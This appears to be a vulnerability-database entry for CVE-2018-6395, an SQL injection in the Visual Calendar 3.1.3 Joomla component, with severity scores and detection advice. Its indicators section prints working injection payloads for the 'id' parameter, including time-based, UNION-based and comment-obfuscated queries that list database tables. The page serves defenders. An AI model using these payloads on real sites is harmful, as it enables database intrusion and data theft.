cbcvebase.
CVE-2018-6395
published 2018-01-30

CVE-2018-6395: SQL Injection exists in the Visual Calendar 3.1.3 component for Joomla! via the id parameter in a view=load action.

PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.70%
84.1th percentile
SQL Injection exists in the Visual Calendar 3.1.3 component for Joomla! via the id parameter in a view=load action.

Affected

1 ranges
VendorProductVersion rangeFixed in
joomlacalendarsvisual_calendar

Detection & IOCsextracted from sources · hover to see the quote

urlindex.php?option=com_visualcalendar&view=load&id=[SQL]
commandid=1 AND SLEEP(5)
commandid=1 AND 2616=2616
commandid=1 UNION ALL SELECT CONCAT(0x716a627a71,0x586a6c7676787a6f684c73745863744b7955784a47534d58797158564a53716d6b57434f6141536c,0x71786b6a71),NULL,NULL,NULL,NULL,NULL-- QpYd
command-1 /*!06666UNION*/ /*!06666SELECT*/ (SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x32,0x33,0x34,0x35,0x36-- -
  • Monitor HTTP GET requests to Joomla components for the parameter combination option=com_visualcalendar&view=load with a manipulated 'id' parameter containing SQL keywords (UNION, SELECT, SLEEP, AND) or encoded equivalents.
  • Detect time-based blind SQLi attempts by alerting on requests to com_visualcalendar containing SLEEP() in the id parameter.
  • Detect UNION-based SQLi attempts by alerting on requests to com_visualcalendar containing UNION ALL SELECT and NULL columns in the id parameter; the exploit uses a 6-column UNION query.
  • Detect obfuscated UNION SELECT using MySQL versioned comment syntax (/*!06666UNION*/ /*!06666SELECT*/) in requests targeting com_visualcalendar.
  • The SQL injection is exclusively via the HTTP GET 'id' parameter; flag any non-integer or SQL-containing value supplied to this parameter in com_visualcalendar requests.
  • ·The exploit targets specifically Visual Calendar version 3.1.3 for Joomla!; other versions may or may not be affected.
  • ·The SQL injection vulnerability is in the 'id' parameter only when the view=load action is used; other views/actions of the component are not confirmed vulnerable by this exploit.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.